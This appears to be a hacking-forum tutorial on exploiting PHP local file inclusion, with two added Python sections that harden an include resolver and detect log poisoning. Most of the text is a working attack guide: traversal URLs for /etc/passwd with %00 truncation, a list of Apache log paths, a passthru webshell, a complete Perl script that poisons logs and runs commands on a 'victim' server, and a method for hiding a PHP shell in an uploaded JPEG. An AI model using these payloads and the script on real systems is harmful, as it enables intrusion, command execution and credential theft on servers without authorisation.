This document describes how to exploit a website vulnerable to local file inclusion (LFI) by accessing restricted files and injecting PHP code to run commands on the server. It explains how to find vulnerable PHP code that directly includes user-supplied pages, use directory traversal to access files outside the web root like /etc/passwd, inject code into log files to execute commands, and upload a shell payload hidden in a JPEG image file.
This tutorial will guide you through the process of exploiting a website through LFI (Local File Inclusion).
First let's take a look at a piece of PHP code that is vulnerable to LFI:

    PHP Code:
    <?php
    $page = $_GET['page'];
    include($page);
    ?>

Now, this is a piece of code that should NEVER be used, because $page isn't sanitized and is passed straight into include(), but unfortunately (or not) it is very common to find in the www world.

Ok, now that we know why it is vulnerable, let's start to use this to our advantage. First let's take a look at how this gives us the ability to "browse" through the web server. Let's imagine there's a file called test.php inside the test directory; if you type victim.com/test/test.php it will retrieve that file, correct? Ok, but if the PHP code that we examined was in index.php we could also retrieve that file through victim.com/index.php?page=test/test.php, see what happened there? Now, if index.php was at victim.com/test/index.php and test.php at victim.com/test.php you will have to type victim.com/test/index.php?page=../test.php. The ../ is called directory traversal; using it will allow you to go up in the directories.

Now that we can go up and down through the server let's use it to access files that we are not supposed to. If this is hosted on a Unix server we can then possibly view the password file of the server; to do this you will have to type something like this (the number of ../ may vary depending on where the vulnerable file is):

    victim.com/index.php?page=../../../../../../../etc/passwd

If you don't know what to do with the content of /etc/passwd then continue reading! /etc/passwd is where the users/passwords are stored; a non-shadowed passwd file will look like this:

    username:passwd:UID:GID:full_name:directory:shell

For example:

    username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh

All you need to do then is grab the username and decode the password.
If the passwd file is shadowed then you'll see something like this:

    username:x:503:100:FullName:/home/username:/bin/sh

As you can see the password is now an x and the encoded password is in /etc/shadow (you will probably not have access to /etc/shadow because it is only readable/writeable by root, while /etc/passwd has to be readable by many processes, that's why you have access to it). You can also sometimes see something like this:

    username:!:503:100:FullName:/home/username:/bin/sh

The ! indicates that the encoded password is stored in the /etc/security/passwd file. Here are a couple of places that may be interesting to "visit":

    /etc/passwd
    /etc/shadow
    /etc/group
    /etc/security/group
    /etc/security/passwd
    /etc/security/user
    /etc/security/environ
    /etc/security/limits
    /usr/lib/security/mkuser.default

You will probably need to google for them, as this is not the right tutorial for it. Just one more quick thing, it's also common to find vulnerable code like:

    PHP Code:
    <?php
    $page = $_GET["page"];
    include("$page.php");
    ?>

In this case, as you can see, it will add .php to the end of whatever you include! So if you type in your browser:

    victim.com/index.php?page=../../../../../../../../etc/passwd

it will try to retrieve:

    victim.com/index.php?page=../../../../../../../../etc/passwd.php

That file doesn't exist and you will see an error message, so you need to apply the null byte (%00):

    victim.com/index.php?page=../../../../../../../../etc/passwd%00

With the null byte the server will ignore everything that comes after %00. There are other ways to use the LFI exploit, so continue reading, the REAL fun is about to begin! We will now try to run commands on the server; we will do this by injecting PHP code into the httpd logs and then accessing them through the LFI!
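Here is an added example, written in Python for this edit and not part of the original tutorial, that models the checks the include($page) code above is missing. The directory layout it builds (a www root with index.php, about.php and test/test.php, plus an etc/passwd placed one level above the root) is constructed for the demo, and the file names and the allowlist are assumptions. It runs the tutorial's own inputs (test/test.php, ../etc/passwd, %00) through an unchecked resolver and through a hardened one that URL-decodes, rejects control bytes, requires an allowlisted page name and confirms that the canonical path stays inside the web root. One caveat on the %00 trick: PHP's include() has refused paths containing a NUL byte since 5.3.4, so it only works on older installs; the hardened resolver does not rely on that.

```python
from __future__ import annotations

import os
import tempfile
from urllib.parse import unquote

# Constructed layout for the demo (hypothetical paths, not from any real site):
#   <base>/www/index.php, <base>/www/about.php, <base>/www/test/test.php
#   <base>/etc/passwd   <- outside the web root, the traversal target
BASE = tempfile.mkdtemp()
WEBROOT = os.path.join(BASE, "www")
os.makedirs(os.path.join(WEBROOT, "test"))
os.makedirs(os.path.join(BASE, "etc"))
for rel in ("index.php", "about.php", "test/test.php"):
    with open(os.path.join(WEBROOT, rel), "w") as fh:
        fh.write("<?php echo 'page'; ?>\n")
with open(os.path.join(BASE, "etc", "passwd"), "w") as fh:
    fh.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed sample line

# The only pages index.php is meant to include (assumed allowlist).
ALLOWED_PAGES = frozenset({"about.php", "test/test.php"})


def vulnerable_resolve(raw_param: str, webroot: str = WEBROOT) -> str | None:
    """What the tutorial's include($page) effectively does: no checks at all.

    The split on NUL mimics the pre-5.3.4 PHP truncation the %00 trick used.
    Returns the path that would be included, or None if nothing is there.
    """
    param = unquote(raw_param).split("\x00", 1)[0]
    target = os.path.join(webroot, param)
    return target if os.path.isfile(target) else None


def resolve_page(raw_param: str, webroot: str = WEBROOT,
                 allowed: frozenset = ALLOWED_PAGES) -> str | None:
    """Hardened resolver: returns the canonical file to include, or None."""
    # PHP hands the script the URL-decoded value, so "%00" arrives as "\x00".
    param = unquote(raw_param)
    # 1. Control bytes (NUL included) are never part of a legitimate page name.
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in param):
        return None
    # 2. Only pages the application knows about may be included.  The raw
    #    parameter is compared, so "../anything" can never match an entry.
    if param not in allowed:
        return None
    # 3. Defence in depth: canonicalise and confirm containment.  This also
    #    catches a symlink inside the root that points outside it.
    root = os.path.realpath(webroot)
    target = os.path.realpath(os.path.join(root, param))
    if os.path.commonpath([root, target]) != root:
        return None
    return target if os.path.isfile(target) else None


if __name__ == "__main__":
    for req in ("test/test.php", "../etc/passwd", "../etc/passwd%00", "..%2Fetc%2Fpasswd"):
        print(f"{req:22} unchecked={vulnerable_resolve(req) is not None}"
              f"  hardened={resolve_page(req) is not None}")
```

The unchecked resolver happily returns the passwd file for the traversal input, while the hardened one refuses every variant and still serves the two pages that were meant to be reachable.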
To do this first find out where the logs are stored; here are some locations that may be useful to you:

    ../apache/logs/error.log
    ../apache/logs/access.log
    ../../apache/logs/error.log
    ../../apache/logs/access.log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../../../../etc/httpd/logs/access_log
    ../../../../../../../etc/httpd/logs/access.log
    ../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../var/www/logs/access_log
    ../../../../../../../var/www/logs/access.log
    ../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../var/log/apache/access_log
    ../../../../../../../var/log/apache2/access_log
    ../../../../../../../var/log/apache/access.log
    ../../../../../../../var/log/apache2/access.log
    ../../../../../../../var/log/access_log
    ../../../../../../../var/log/access.log
    ../../../../../../../var/www/logs/error_log
    ../../../../../../../var/www/logs/error.log
    ../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../var/log/apache/error_log
    ../../../../../../../var/log/apache2/error_log
    ../../../../../../../var/log/apache/error.log
    ../../../../../../../var/log/apache2/error.log
    ../../../../../../../var/log/error_log
    ../../../../../../../var/log/error.log

Ok, now that you know where the logs are, take a look at them and see what they store. In this example we will use a log that stores the "not found" files and the PHP code <? passthru($_GET[cmd]) ?>. You would then type in your browser victim.com/<? passthru($_GET[cmd]) ?> and the PHP code will be logged because it "doesn't exist". This probably won't work, because if you go look into the log you will most likely see the PHP code like this:

    %3C?%20passthru($_GET[cmd])%20?>

because your browser will URL-encode the whole thing!
So you'll need to use something else; if you don't have a script of your own you can use this Perl script I've written:

    #!/usr/bin/perl -w
    use strict;
    use IO::Socket;

    my $site = "victim.com";
    my $path = "/folder/";
    my $code = "<? passthru(\$_GET[cmd]) ?>";
    my $log  = "../../../../../../../etc/httpd/logs/error_log";

    print "Trying to inject the code\n";
    my $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $site, PeerPort => "80")
        or die "\nConnection Failed.\n\n";
    # The request line and the User-Agent are written to the socket as-is,
    # without URL encoding, so the code lands in the log exactly as typed.
    print $socket "GET " . $path . $code . " HTTP/1.1\r\n";
    print $socket "User-Agent: " . $code . "\r\n";
    print $socket "Host: " . $site . "\r\n";
    print $socket "Connection: close\r\n\r\n";
    close($socket);
    print "\nCode $code successfully injected in $log \n";

    print "\nType command to run or exit to end: ";
    my $cmd = <STDIN>;
    chomp($cmd);
    while ($cmd ne "exit") {
        $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $site, PeerPort => "80")
            or die "\nConnection Failed.\n\n";
        # Include the poisoned log through the LFI and pass the command in cmd=
        print $socket "GET " . $path . "index.php?page=" . $log . "&cmd=$cmd HTTP/1.1\r\n";
        print $socket "Host: " . $site . "\r\n";
        print $socket "Accept: */*\r\n";
        print $socket "Connection: close\r\n\r\n";
        while (my $show = <$socket>) { print $show; }
        print "Type command to run or exit to end: ";
        $cmd = <STDIN>;
        chomp($cmd);
    }

Copy/paste that, save it as whatever.pl and change the $site, $path, $code and $log values at the top according to your victim site. If the vulnerable code is in victim.com/main/test.php you should change /folder/ to /main/, index.php?page= to test.php?page= and ../../../../../../../etc/httpd/logs/error_log to where the log is! That script will inject the code and then ask you for a command to run on the server! You know what to do now!

Last but not least we will take a look at how to use the avatar/image upload function found in a lot of web applications. You may have seen this in the "Local JPG Shell injection video" at milw0rm, but the best part, which was not mentioned there, is that the web application DOESN'T need to be installed on your victim website!
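An added example (mine, not the tutorial's) that looks at the same technique from the log-review side: a small Python checker that parses Apache combined-format lines and flags the requests the steps above generate, i.e. traversal and %00 in the page parameter, PHP open tags in the request line or the User-Agent (the script above plants the code in both), and an include of a log path combined with a cmd parameter. The five log lines are constructed for this demo with documentation-range IPs; nothing here comes from a real server, and the rule names are my own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines (documentation-range IPs).  Lines
# 2-4 reproduce the tutorial's steps; lines 1 and 5 are ordinary traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=test/test.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../../../../../etc/passwd%00 HTTP/1.1" 200 1847 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /<? passthru($_GET[cmd]) ?> HTTP/1.1" 404 209 "-" "<? passthru($_GET[cmd]) ?>"',
    '203.0.113.7 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?page=../../../../../../../var/log/apache2/error.log&cmd=id HTTP/1.1" 200 3310 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /about.php HTTP/1.1" 200 1024 "-" "curl/7.88.1"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A query-parameter value that points at a web-server log file.
LOG_PATH_RE = re.compile(r"(access|error)[._]?log$|/logs?/")
# Files the tutorial lists as interesting to read through the include.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/etc/group", "/etc/security/")


def parse_line(line):
    """Split one combined-format line into fields; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = entry["req"].split(" ")
    entry["method"] = parts[0]
    # Everything between the method and the protocol token is the URI, even
    # when it contains spaces (an unencoded "<? ... ?>" does).
    entry["uri"] = " ".join(parts[1:-1]) if len(parts) >= 3 else " ".join(parts[1:])
    return entry


def findings_for(entry):
    """Return the set of rule names one entry triggers."""
    tags = set()
    raw_uri = entry["uri"]
    uri = unquote(raw_uri)
    ua = unquote(entry["ua"])
    if "%00" in raw_uri.lower() or "\x00" in uri:
        tags.add("null_byte")
    if "../" in uri or "..\\" in uri:
        tags.add("traversal")
    if "<?" in uri or "<?" in ua:
        tags.add("php_tag")
    query = parse_qs(urlsplit(raw_uri).query, keep_blank_values=True)
    for values in query.values():
        for value in values:
            low = value.lower()
            if LOG_PATH_RE.search(low):
                tags.add("log_include")
            if any(s in low for s in SENSITIVE):
                tags.add("sensitive_file")
    if "log_include" in tags and "cmd" in query:
        tags.add("log_poison_exec")  # poisoned log included together with a command
    return tags


def analyse(lines):
    """Return [(ip, uri, sorted tags)] for every line that triggers a rule."""
    results = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        tags = findings_for(entry)
        if tags:
            results.append((entry["ip"], entry["uri"], sorted(tags)))
    return results


if __name__ == "__main__":
    for ip, uri, tags in analyse(SAMPLE_LOG):
        print(ip, ", ".join(tags), uri, sep="  ")
```

The php_tag rule is the one worth keeping on an error log as well as the access log, since the injected request is a 404 and the User-Agent copy is what ends up in error_log; the log_poison_exec combination is the high-confidence signal that the chain completed.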
This is a quick explanation; for a better understanding you can view the video at http://www.milw0rm.com/video/watch.php?id=57. You need to "insert" the PHP code you want to execute inside the image; to do this you'll need to use your favorite hex editor, or you can use the edjpgcom program (download: http://software.security-shell.com/i...e=edjpgcom.zip); all you need to do is right-click on the image, Open with..., then select the edjpgcom program and just type the code. Ok, now that you have your shell in the image all you need to do is upload it! If victim.com has a forum or something else that allows you to upload, great; if not, check if it's on shared hosting, and if so do a reverse lookup on it! Now that you have a list of potential sites that may have a forum or something else that allows you to upload your image, all you need to do is take some time to browse through them until you find one! After you have found one and uploaded your image, here is the tricky part: you'll need to "create" an error on it (in order to find the server path to it)! Try for example to create a MySQL error and you will get something like this:

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sitefolder/public_html/includes/view.php on line 37

If you can't force an error go back to the /etc/passwd file:

    username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh

As you can see the username is also the directory name; most of the time the name is similar to the domain name, but if that's not the case you'll have to try them until you find the one you're looking for! Go to your avatar image, right-click on it and then Properties (write down the path to it); you're now all set up.
In your browser type this (again, the number of ../ may vary):

    victim.com/index.php?page=../../../../../../../../../home/the_other_site_dir/public_html/path_to_your_avatar/avatar.jpg

In other "words" it should look like this (using fictitious "names"):

    victim.com/index.php?page=../../../../../../../../../home/arcfull/public_html/forum/uploads/avatar.jpg

After you type this you will see the result of the code inserted in the image! And that's all, these are the most common ways you can exploit with LFI. Hope you have enjoyed this tutorial at SecurityTeam.